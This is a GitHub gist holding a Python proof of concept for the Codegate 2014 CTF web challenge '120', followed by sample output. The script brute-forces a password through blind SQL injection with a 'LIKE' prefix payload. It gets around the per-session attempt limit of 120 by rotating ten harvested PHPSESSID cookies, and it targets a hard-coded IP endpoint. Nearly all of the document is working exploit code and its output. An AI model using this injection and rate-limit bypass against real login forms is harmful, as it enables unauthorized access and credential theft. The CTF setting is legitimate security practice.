
@nmcv
Created February 24, 2014 10:53
Codegate 2014 web "120" PoC
#!/bin/env python3
import string
import urllib
from urllib.request import urlopen
import requests # <- bitch (always URL-encodes POST data)
# Endpoint of the challenge instance that every request in this script targets.
url = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"

# PHPSESSID values collected before any guessing starts.
cookie_jar = []

# Password prefix confirmed so far; grows by one character per hit.
password = ''

# Shared counter: first counts collected sessions, later the attempts left
# on the session currently in use.
cnt = 0

# Attempt budget per session. The visible script never reads this name and
# repeats the literal 120 instead.
cnt_max = 120
# Collect ten session identifiers up front. Each POST is sent without a
# cookie, so the server answers with a fresh PHPSESSID every time.
print("Obtaining PHPSESSID's:")
# The form value is the same for every request, so build it once.
seed_form = {"password": "'+'{}%".format("")}
while cnt < 10:
    reply = requests.post(url, data=seed_form)
    # Raises KeyError if the response carries no PHPSESSID cookie.
    session_id = reply.cookies['PHPSESSID']
    print(session_id)
    cookie_jar.append(session_id)
    cnt += 1
print("Bruteforcing password:")
# Start on the first collected session; the others are held in reserve.
session_ids = iter(cookie_jar)
active_session = next(session_ids)
print("Using cookie {}".format(active_session))
# Attempts allowed on one session before the script switches to the next.
# NOTE(review): that the limit is tracked per PHPSESSID is inferred from this
# rotation. A limit keyed on a cookie the client can replace does not bound
# the total number of guesses; the server code is not shown here.
cnt = 120
for _position in range(30):  # password length is 30
    # Candidates are limited to a..z.
    for candidate in string.ascii_lowercase:
        # One attempt left on this session: move to the next PHPSESSID and
        # reset the counter. next() raises StopIteration once the jar is empty.
        if cnt == 1:
            active_session = next(session_ids)
            print("Using cookie {}".format(active_session))
            cnt = 120
        print("Trying the next char: {}".format(candidate))
        # The body is assembled by hand and sent through urllib so it reaches
        # the server verbatim, without the URL-encoding requests applies.
        # It only has an effect if the server splices the field into its SQL
        # text (presumably the case here); a parameterized query would treat
        # the whole value as data.
        raw_body = "password='+or+password+like+'{}%".format(
            password + candidate
        ).encode('ascii')
        probe = urllib.request.Request(
            url,
            raw_body,
            headers={
                'Cookie': "PHPSESSID={}".format(active_session),
                'Content-Length': str(len(raw_body)),
            },
        )
        cnt -= 1
        reply_body = urlopen(probe).read()
        # A body ending in b"True" is taken as confirmation of the guessed
        # prefix; any other ending means this candidate is wrong.
        if not reply_body.endswith(b"True"):
            continue
        password += candidate
        print("Found next char {} (attempts left = {}, current password = {})".format(candidate, cnt, password))
        break

nmcv commented Feb 24, 2014

Sample output:

$ python3 ./brute_server.py
Obtaining PHPSESSID's:
jijt9it52b6200ttp9vgtk3er6
4m06gr1k7h4rrso3q0shrdfv87
fcrnlh8hqfs8dhbimkgj6ma7q0
l1vbdh632odn8vlivpm2li9f41
edkoh110pt2gokca99q6tc4lf1
lkp2o4bslouk7q34oo94d87fr6
nnad3up8r76hj5brqoeb8cv9i4
o4n8k9d7qj24p4anuh3c6i3vr1
tsv0777i2ecuhteianrs676tc5
sn7887n566lg9d8ltji0tnss91
Bruteforcing password:
Using cookie jijt9it52b6200ttp9vgtk3er6
Trying the next char: a
Found next char a (attempts left = 119, current password = a)
...
...
...
